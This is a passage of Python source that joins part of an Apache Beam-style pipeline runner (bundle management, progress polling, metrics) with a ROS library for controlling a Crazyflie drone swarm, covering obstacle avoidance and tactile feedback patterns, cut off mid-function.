receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
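# Editor's illustrative sketch of the coroutine protocol described above
# (hypothetical test code, not part of the runner): the manager yields a
# fraction of the remaining work to split off and receives the corresponding
# split result back via send(). A test would register it with, e.g.,
# `with split_manager('MyStage', _example_halfway_split_manager): ...`.
def _example_halfway_split_manager(num_elements):
  # Ask for a single split at half of the remaining elements, then stop.
  split_result = yield 0.5
  del split_result  # a real test would inspect the ProcessBundleSplitResponse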
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=FnApiRunner.get_cache_token_generator()):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None
self._cache_token_generator = cache_token_generator
def _send_input_to_worker(self,
process_bundle_id,
read_transform_id,
byte_streams):
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs,
process_bundle_id):
split_results = []
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_id=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(
process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_id=self._bundle_descriptor.id,
cache_tokens=[next(self._cache_token_generator)]))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = []
with ProgressRequester(
self._worker_handler, process_bundle_id, self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
if output.transform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(
expected_outputs[output.transform_id]).append(output.data)
logging.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=
beam_fn_api_pb2.FinalizeBundleRequest(
instruction_id=process_bundle_id
))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=None, **kwargs):
super(ParallelBundleManager, self).__init__(
worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency, skip_registration,
cache_token_generator=cache_token_generator)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self, inputs, expected_outputs):
part_inputs = [{} for _ in range(self._num_workers)]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None
split_result_list = []
with futures.ThreadPoolExecutor(max_workers=self._num_workers) as executor:
for result, split_result in executor.map(lambda part: BundleManager(
self._worker_handler_list, self._get_buffer,
self._get_input_coder_impl, self._bundle_descriptor,
self._progress_frequency, self._registered,
cache_token_generator=self._cache_token_generator).process_bundle(
part, expected_outputs), part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self, worker_handler, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_id=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
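# Editor's illustrative sketch (hypothetical values): ProgressRequester is
# used as a context manager around bundle execution, polling the worker for
# progress every `frequency` seconds and forwarding each report to the
# callback.
def _example_progress_logging(worker_handler, instruction_id):
  def log_progress(progress):
    logging.debug('Bundle progress: %s', progress)
  with ProgressRequester(worker_handler, instruction_id, 0.5, log_progress):
    pass  # a real caller would wait on the bundle's result future here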
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, includes user metrics only.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._monitoring_infos = step_monitoring_infos
for smi in step_monitoring_infos.values():
counters, distributions, gauges = \
portable_metrics.from_monitoring_infos(smi, user_metrics_only)
self._counters.update(counters)
self._distributions.update(distributions)
self._gauges.update(gauges)
def query(self, filter=None):
counters = [MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
swarmlib.py
|
#!/usr/bin/env python
from __future__ import division
import rospy
import tf
from geometry_msgs.msg import PoseStamped, TransformStamped, Twist
from nav_msgs.msg import Path
from visualization_msgs.msg import Marker
from math import *
import math
import time
from time import sleep
from std_srvs.srv import Empty
from tf2_msgs.msg import TFMessage
import message_filters
import sys
import numpy as np
import serial
from scipy.integrate import odeint
from tf import TransformListener
from crazyflie_driver.msg import FullState
from crazyflie_driver.msg import Position
from multiprocessing import Process
import os
np.set_printoptions(formatter={'float': '{: 0.2f}'.format})
# Main classes ####################################################################
class Swarm_manager():
    def __init__(self, drone_name_list):
        self.drone_name_list = drone_name_list
        # Build a Drone (the capitalised class defined below) for each name and
        # keep them on the instance; __init__ must not return a value.
        self.drone_object_list = []
        for drone_name in self.drone_name_list:
            self.drone_object_list.append(Drone(drone_name))
def update_position_for_all(self, drone_object_list):
for drone_object in drone_object_list:
drone_object.position()
class Mocap_object: # superclass
def __init__(self, name):
self.name = name
self.tf = '/vicon/'+name+'/'+name
self.tl = TransformListener()
self.pose = np.array([0.,0.,0.])
self.orient = np.array([0,0,0]) # Euler angles
self.path = Path()
# for velocity:
sub = message_filters.Subscriber(self.tf, TransformStamped)
self.cache = message_filters.Cache(sub, 100)
self.vel = np.array([0,0,0])
def position(self):
self.tl.waitForTransform("/world", self.tf, rospy.Time(0), rospy.Duration(1))
position, quaternion = self.tl.lookupTransform("/world", self.tf, rospy.Time(0))
self.pose = np.array(position)
return np.array(position)
def orientation(self):
self.tl.waitForTransform("/world", self.tf, rospy.Time(0), rospy.Duration(1))
position, quaternion = self.tl.lookupTransform("/world", self.tf, rospy.Time(0))
self.orient = get_angles(np.array(quaternion))
return get_angles(np.array(quaternion))
def publish_position(self):
publish_pose(self.pose, self.orient, self.name+"_pose")
def publish_path(self, limit=1000):
publish_path(self.path, self.pose, self.orient, self.name+"_path", limit)
def velocity(self):
aver_interval = 0.1 # sec
msg_past = self.cache.getElemAfterTime(self.cache.getLatestTime() - rospy.rostime.Duration(aver_interval))
msg_now = self.cache.getElemAfterTime(self.cache.getLatestTime())
if (msg_past is not None) and (msg_now is not None) and (msg_now.header.stamp != msg_past.header.stamp):
vel = vel_estimation_TransformStamped(msg_past, msg_now)
self.vel = vel
class Obstacle(Mocap_object):
def __init__(self, name='obstacle'):
Mocap_object.__init__(self, name)
self.R = 0.1
self.pose = np.array([0,0,0])
self.orient = np.array([0,0,0])
self.dist_to_drones = []
self.attractive_coef = 1./700
self.repulsive_coef = 200
def publish_position(self):
# publish_pose(self.pose, self.orient, self.name+"_pose")
publish_cylinder(self.pose, self.orient, self.R, self.name+"_cylinder")
def calculate_dist(self, drones_poses):
    # Rebuild the list on each call: indexing into the initially empty
    # self.dist_to_drones would raise an IndexError.
    self.dist_to_drones = [np.linalg.norm(pose - self.pose) for pose in drones_poses]
def safety_borders(self, R, N=1000):
""" circumference near obstacle """
C = np.zeros((N,2))
C[:,0] = self.pose[0] + R*np.cos(np.linspace(-pi,pi,N))
C[:,1] = self.pose[1] + R*np.sin(np.linspace(-pi,pi,N))
return C
class Drone(Mocap_object):
def __init__(self, name, leader = False):
Mocap_object.__init__(self, name)
self.leader = leader
self.sp = np.array([0.,0.,0.])
self.near_obstacle = False
self.nearest_obstacle = None
self.rad_imp = radius_impedance_model() # Obstacle avoidance
sub_sp = message_filters.Subscriber(self.name+"_sp", PoseStamped)
self.cache_sp = message_filters.Cache(sub_sp, 100)
self.vel_sp = np.array([0,0,0])
def publish_sp(self):
publish_pose(self.sp, np.array([0,0,0]), self.name+"_sp")
def publish_path_sp(self, limit=1000):
publish_path(self.path, self.sp, self.orient, self.name+"_path_sp", limit)
def fly(self):
publish_goal_pos(self.sp, 0, "/"+self.name)
def apply_limits(self, upper_limits, lower_limits):
    np.putmask(self.sp, self.sp >= upper_limits, upper_limits)
    np.putmask(self.sp, self.sp <= lower_limits, lower_limits)
def update_radius_imp(self, delta):
if self.rad_imp.inside:
radius_obstacle_impedance(self)
self.sp += self.rad_imp.pose
def velocity_sp(self):
aver_interval = 0.2 # sec
if self.cache_sp.getLatestTime() is not None:
msg_past = self.cache_sp.getElemAfterTime(self.cache_sp.getLatestTime() - rospy.rostime.Duration(aver_interval))
msg_now = self.cache_sp.getElemAfterTime(self.cache_sp.getLatestTime())
if (msg_past is not None) and (msg_now is not None) and (msg_now.header.stamp != msg_past.header.stamp):
vel_sp = vel_estimation_PoseStamped(msg_past, msg_now)
self.vel_sp = vel_sp
class radius_impedance_model:
def __init__(self):
self.inside = False
self.penetration = None
self.imp_pose = 0
self.imp_vel = 0
self.time_prev = time.time()
# Service functions ###############################################################
def publish_goal_pos(cf_goal_pos, cf_goal_yaw, cf_name):
name = cf_name + "/cmd_position"
msg = msg_def_crazyflie(cf_goal_pos, cf_goal_yaw)
pub = rospy.Publisher(name, Position, queue_size=1)
pub.publish(msg)
def publish_pose(pose, orient, topic_name):
msg = msg_def_PoseStamped(pose, orient)
pub = rospy.Publisher(topic_name, PoseStamped, queue_size=1)
pub.publish(msg)
def publish_cylinder(pose, orient, R, topic_name):
shape = Marker.CYLINDER
msg = msg_def_Cylinder(pose, orient, shape, R=R)
pub = rospy.Publisher(topic_name, Marker, queue_size=1)
pub.publish(msg)
def publish_path(path, pose, orient, topic_name, limit=1000):
msg = msg_def_PoseStamped(pose, orient)
path.header = msg.header
path.poses.append(msg)
if limit>0:
path.poses = path.poses[-limit:]
pub = rospy.Publisher(topic_name, Path, queue_size=1)
pub.publish(path)
def publish_vel(vel, topic_name):
msg = Twist()
msg.linear.x = vel[0]
msg.linear.y = vel[1]
msg.linear.z = vel[2]
pub = rospy.Publisher(topic_name, Twist, queue_size=1)
pub.publish(msg)
def get_angles(message):
quat = ( message[0], message[1], message[2], message[3] )
euler = tf.transformations.euler_from_quaternion(quat)
return euler
def msg_def_crazyflie(pose, yaw):
worldFrame = rospy.get_param("~worldFrame", "/world")
msg = Position()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = worldFrame
msg.x = pose[0]
msg.y = pose[1]
msg.z = pose[2]
msg.yaw = yaw
return msg
def msg_def_PoseStamped(pose, orient):
worldFrame = "world"
msg = PoseStamped()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = worldFrame
msg.pose.position.x = pose[0]
msg.pose.position.y = pose[1]
msg.pose.position.z = pose[2]
quaternion = tf.transformations.quaternion_from_euler(orient[0], orient[1], orient[2]) #1.57
msg.pose.orientation.x = quaternion[0]
msg.pose.orientation.y = quaternion[1]
msg.pose.orientation.z = quaternion[2]
msg.pose.orientation.w = quaternion[3]
msg.header.seq += 1
return msg
def msg_def_Cylinder(pose, orient, shape, R):
worldFrame = "world"
msg = Marker()
msg.header.seq = 0
msg.header.stamp = rospy.Time.now()
msg.header.frame_id = worldFrame
msg.type = shape
msg.pose.position.x = pose[0]
msg.pose.position.y = pose[1]
msg.pose.position.z = pose[2] * 0.5
# quaternion = tf.transformations.quaternion_from_euler(orient[0], orient[1], orient[2])
quaternion = tf.transformations.quaternion_from_euler(0,0,0)
msg.pose.orientation.x = quaternion[0]
msg.pose.orientation.y = quaternion[1]
msg.pose.orientation.z = quaternion[2]
msg.pose.orientation.w = quaternion[3]
msg.scale.x = R
msg.scale.y = R
msg.scale.z = 2.0
msg.color.r = 0.0
msg.color.g = 1.0
msg.color.b = 0.0
msg.color.a = 1.0
msg.header.seq += 1
msg.header.stamp = rospy.Time.now()
return msg
def rotate(origin, drone, human): # rotate drone around point
"""
Rotate a point counterclockwise by a given angle around a given origin.
The angle should be given in radians.
"""
ox, oy = origin[0], origin[1]
px, py = drone.sp[0], drone.sp[1]
qx = ox + math.cos(human.orientation()[2]) * (px - ox) - math.sin(human.orientation()[2]) * (py - oy)
qy = oy + math.sin(human.orientation()[2]) * (px - ox) + math.cos(human.orientation()[2]) * (py - oy)
return np.array([qx, qy, drone.sp[2]])
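# Editor's illustrative sketch of the same 2D rotation applied to a bare point
# (hypothetical helper, not used elsewhere): rotating (1, 0) by pi/2 about the
# origin gives approximately (0, 1).
def rotate_point_example(point, origin, angle):
    ox, oy = origin
    px, py = point
    qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
    qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
    return np.array([qx, qy])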
def centroid_calc(drone1, drone2, drone3): # centroid of triangle
x_aver = np.array([drone1.sp[0], drone2.sp[0], drone3.sp[0]])
y_aver = np.array([drone1.sp[1], drone2.sp[1], drone3.sp[1]])
z_aver = np.array([drone1.sp[2], drone2.sp[2], drone3.sp[2]])
centroid = np.array([ np.mean(x_aver), np.mean(y_aver), np.mean(z_aver) ])
return centroid
def vel_estimation_TransformStamped(msg_past, msg_now): # from two TransformStamped messages
x_now = msg_now.transform.translation.x
x_past = msg_past.transform.translation.x
y_now = msg_now.transform.translation.y
y_past = msg_past.transform.translation.y
z_now = msg_now.transform.translation.z
z_past = msg_past.transform.translation.z
time_now = msg_now.header.stamp.to_sec()
time_past = msg_past.header.stamp.to_sec()
vel_x = (x_now-x_past)/(time_now-time_past)
vel_y = (y_now-y_past)/(time_now-time_past)
vel_z = (z_now-z_past)/(time_now-time_past)
vel = np.array([vel_x, vel_y, vel_z])
return vel
def vel_estimation_PoseStamped(msg_past, msg_now): # from two PoseStamped messages
x_now = msg_now.pose.position.x
x_past = msg_past.pose.position.x
y_now = msg_now.pose.position.y
y_past = msg_past.pose.position.y
z_now = msg_now.pose.position.z
z_past = msg_past.pose.position.z
time_now = msg_now.header.stamp.to_sec()
time_past = msg_past.header.stamp.to_sec()
vel_x = (x_now-x_past)/(time_now-time_past)
vel_y = (y_now-y_past)/(time_now-time_past)
vel_z = (z_now-z_past)/(time_now-time_past)
vel = np.array([vel_x, vel_y, vel_z])
return vel
# Obstacle avoidance functions #######################################################
def update_obstacle(drone, obstacle, R):
# obstacle_pose = obstacle.position()[:2]
# drone_pose = drone.sp[:2]
dist = np.linalg.norm(obstacle.position()[:2]-drone.sp[:2]) # in 2D
if dist<R:
updated_pose = quad_prog_circle(drone.sp, obstacle.position(), R)
drone.near_obstacle = True
drone.nearest_obstacle = obstacle
drone.rad_imp.inside = True
drone.rad_imp.penetration = updated_pose - drone.sp[:2]
else:
# updated_pose = drone_pose
drone.near_obstacle = False
drone.nearest_obstacle = None
drone.rad_imp.inside = False
drone.rad_imp.penetration = None
drone.rad_imp.imp_pose = 0
drone.rad_imp.imp_vel = np.linalg.norm(drone.vel_sp[:2]) # 0
drone.rad_imp.time_prev = time.time()
return drone
# Obstacle avoidance functions #######################################################
def pose_update_obstacle_circle(drone, R):
updated_pose = quad_prog_circle(drone.sp, drone.nearest_obstacle.position(), R)
drone.sp = np.append(updated_pose, drone.sp[2])
return drone
# # Obstacle avoidance functions #######################################################
# def pose_update_obstacle(drone, obstacle, R):
# obstacle_pose = obstacle.position()[:2]
# drone_pose = drone.sp[:2]
# dist = np.linalg.norm(obstacle_pose-drone_pose)
# if dist<R:
# updated_pose = quad_prog_circle(drone_pose, obstacle_pose, R)
# drone.obstacle_update_status = [True, obstacle.name]
# drone.rad_imp.inside = True
# else:
# updated_pose = drone_pose
# drone.obstacle_update_status = [False, None]
# drone.rad_imp.inside = False
# drone.rad_imp.penetration = updated_pose - drone_pose
# # delta = updated_pose - drone_pose
# drone.sp = np.append(updated_pose, drone.sp[2])
# return drone#, delta
def quad_prog_circle(drone_pose, obstacle_pose, R):
drone_pose = drone_pose[:2] # in 2D
obstacle_pose = obstacle_pose[:2] # in 2D
eq1 = np.array([ [obstacle_pose[0],1], [drone_pose[0],1] ])
eq2 = np.array([obstacle_pose[1],drone_pose[1]])
line_equation = np.linalg.solve(eq1, eq2)
k = line_equation[0]
b = line_equation[1]
a_ = k**2+1
b_ = 2*k*b - 2*k*obstacle_pose[1] -2*obstacle_pose[0]
c_ = obstacle_pose[1]**2 - R**2 + obstacle_pose[0]**2 - 2*b*obstacle_pose[1] + b**2
D = (b_**2) - (4*a_*c_)
if D>0:
x_1 = (-b_-sqrt(D))/(2*a_)
x_2 = (-b_+sqrt(D))/(2*a_)
y_1 = k * x_1 + b
y_2 = k * x_2 + b
point1 = np.array([ x_1, y_1])
point2 = np.array([ x_2, y_2])
dist_point1 = np.linalg.norm(point1 - drone_pose)
dist_point2 = np.linalg.norm(point2 - drone_pose)
if dist_point1 < dist_point2:
updated_pose = point1
else:
updated_pose = point2
return updated_pose
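# Editor's illustrative sketch (hypothetical values): quad_prog_circle()
# projects the drone set-point onto the circle of radius R around the
# obstacle, along the line through the drone and the obstacle, picking the
# intersection closer to the drone; the result therefore lies on the safety
# circle.
def quad_prog_circle_example():
    drone_sp = np.array([2.0, 1.0, 1.0])
    obstacle = np.array([0.0, 0.0, 0.0])
    projected = quad_prog_circle(drone_sp, obstacle, 1.0)
    assert abs(np.linalg.norm(projected - obstacle[:2]) - 1.0) < 1e-6
    return projected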
def Pendulum(state, t, M):
theta, omega = state
J = 1.; b = 10.; k = 0.
dydt = [omega, (M - b*omega - k*np.sin(theta)) / J ]
return dydt
# theta_from_pose returns the angle between the X axis and the vector (drone_pose - obstacle_pose), measured in the XY-plane
def theta_from_pose(drone_pose, obstacle_pose):
# #[0, 2pi] - range
# if drone_pose[1] >= obstacle_pose[1]:
# theta = acos( (drone_pose[0]-obstacle_pose[0]) / np.linalg.norm(drone_pose[:2] - obstacle_pose[:2]) )
# else:
# theta = 2*pi - acos( (drone_pose[0]-obstacle_pose[0]) / np.linalg.norm(drone_pose[:2] - obstacle_pose[:2]) )
theta = np.sign(drone_pose[1]-obstacle_pose[1]) * acos( (drone_pose[0]-obstacle_pose[0]) / np.linalg.norm(drone_pose[:2] - obstacle_pose[:2]) ) # [-pi,pi] - range
return theta
# THETA OBSTACLE IMPEDANCE
def impedance_obstacle_theta(theta, imp_theta_prev, imp_omega_prev, time_prev):
M_coeff = 10 # 7
time_step = time.time() - time_prev
time_prev = time.time()
t = [0. , time_step]
M = - sin(imp_theta_prev - theta) * M_coeff
state0 = [imp_theta_prev, imp_omega_prev]
state = odeint(Pendulum, state0, t, args=(M,))
state = state[1]
imp_theta = state[0]
imp_omega = state[1]
return imp_theta, imp_omega, time_prev
def obstacle_status(obstacle_pose_input, drone_pose_sp, imp_pose_from_theta, human_pose, R, flew_in, flew_out):
obstacle_pose = np.array([ obstacle_pose_input[0], obstacle_pose_input[1] ])
drone_sp = np.array([ drone_pose_sp[0] , drone_pose_sp[1] ])
dist = np.linalg.norm(obstacle_pose-drone_sp)
if imp_pose_from_theta is not None:
drone_imp = np.array([ imp_pose_from_theta[0] , imp_pose_from_theta[1] ])
d_theta = theta_from_pose(drone_sp, obstacle_pose) - theta_from_pose(drone_imp, obstacle_pose)
else:
d_theta = pi
#S = sin(d_theta)
if dist<R+0.03:
# the drone is near the obstacle
flew_in += 1
flew_out = 0
#elif dist>R and (S > 0 and S < 1):
#elif dist>R and np.linalg.norm(object_pose_input-human_pose_input)<1.1:
elif dist>R and abs( d_theta ) < pi/3.:
print "flew_out: "+"dist="+str(dist>R)+", d_theta="+str(180/pi*d_theta)
flew_in = 0
flew_out += 1
return flew_in, flew_out
# DRONE ANGULAR VELOCITY CALCULATION
drone_time_array = np.ones(10)
drone_pose_array = np.array([ np.ones(10), np.ones(10), np.ones(10) ])
def drone_w(drone_pose, R):
for i in range(len(drone_time_array)-1):
drone_time_array[i] = drone_time_array[i+1]
drone_time_array[-1] = time.time()
for i in range(len(drone_pose_array[0])-1):
drone_pose_array[0][i] = drone_pose_array[0][i+1]
drone_pose_array[1][i] = drone_pose_array[1][i+1]
drone_pose_array[2][i] = drone_pose_array[2][i+1]
drone_pose_array[0][-1] = drone_pose[0]
drone_pose_array[1][-1] = drone_pose[1]
drone_pose_array[2][-1] = drone_pose[2]
vel_x = (drone_pose_array[0][-1]-drone_pose_array[0][0])/(drone_time_array[-1]-drone_time_array[0])
vel_y = (drone_pose_array[1][-1]-drone_pose_array[1][0])/(drone_time_array[-1]-drone_time_array[0])
vel_z = (drone_pose_array[2][-1]-drone_pose_array[2][0])/(drone_time_array[-1]-drone_time_array[0])
drone_vel = np.array( [vel_x, vel_y, vel_z] )
# drone_vel_n = np.dot(drone_vel, R)/(np.linalg.norm(R)**2) * R
# drone_vel_t = drone_vel - drone_vel_n
drone_w = np.cross(drone_vel, R)
return drone_w, drone_vel
# TACTILE ########################################################################################
prev_pattern_time = time.time()
pattern_duration = 0
area_pattern = False
left_right_pattern = False
prev_pattern = 'left_right_pattern'
#___________________________________________________________________________________________________
duration = 4
high_lev = 9
empty = np.zeros((5, 1, 2))
empty = (
[0, 1],
[0, 1],
[0, 1],
[0, 1],
[0, 1])
L = np.zeros((5, 1, 2)) #5,7,9
L = (
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration],
[0, duration])
R = np.zeros((5, 1, 2)) #5,7,9
R = (
[0, duration],
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration])
MR1 = np.zeros((5, 1, 2))
MR1 = (
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration])
MR2 = np.zeros((5, 1, 2))
MR2 = (
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration])
MR3 = np.zeros((5, 1, 2))
MR3 = (
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration])
ML1 = np.zeros((5, 1, 2))
ML1 = (
[0, duration],
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration])
ML2 = np.zeros((5, 1, 2))
ML2 = (
[0, duration],
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration])
ML3 = np.zeros((5, 1, 2))
ML3 = (
[0, duration],
[high_lev, duration],
[0, duration],
[0, duration],
[0, duration])
M1 = np.zeros((5, 1, 2))
M1 = (
[0, duration],
[high_lev, duration*2],
[high_lev, duration*2],
[high_lev, duration*2],
[0, duration])
#________________________________________________________________________________________________________
#Decreasing distance (extended state)
P9=[]
P9.append(np.copy(R))
P10=[]
P10.append(np.copy(L))
P11=[]
P11.append(np.copy(MR1))
P11.append(np.copy(MR2))
P11.append(np.copy(MR3))
P12=[]
P12.append(np.copy(ML1))
P12.append(np.copy(ML2))
P12.append(np.copy(ML3))
P13=[]
P13.append(np.copy(M1))
from std_msgs.msg import String
str_msg = String()
pub = rospy.Publisher('pattern_topic', String, queue_size=10)
def patter_publisher(pattern_type):
str_msg.data = pattern_type
pub.publish(str_msg)
def tactile_patterns(drone1, drone2, drone3, human, l, move_right, move_left):
global prev_pattern_time
global pattern_duration
global area_pattern
global left_right_pattern
global prev_pattern
# AREA calc
# https://stackoverflow.com/questions/24467972/calculate-area-of-polygon-given-x-y-coordinates
x = np.array([drone1.sp[0], drone2.sp[0], drone3.sp[0]])
y = np.array([drone1.sp[1], drone2.sp[1], drone3.sp[1]])
def PolyArea(x,y):
return 0.5*np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1)))
# print 'PolyArea(x,y)', PolyArea(x,y)
default_area = l*l*math.sqrt(3)/4
if (time.time()-prev_pattern_time)>(pattern_duration):
patter_publisher('')
extended = False
contracted = False
if PolyArea(x,y)>default_area*1.1 or (drone2.sp[1] - drone3.sp[1])>l*1.075:
extended = True
elif PolyArea(x,y)<default_area*0.9:
contracted = True
# centroid = centroid_calc(drone1, drone2, drone3)
if extended and move_left:
print 'pattern extended RIGHT'
pattern_duration = Send(P9)
patter_publisher('extended_right')
if extended and move_right:
print 'pattern extended LEFT'
pattern_duration = Send(P10)
patter_publisher('extended_left')
if contracted and move_right:
print 'pattern contracted RIGHT'
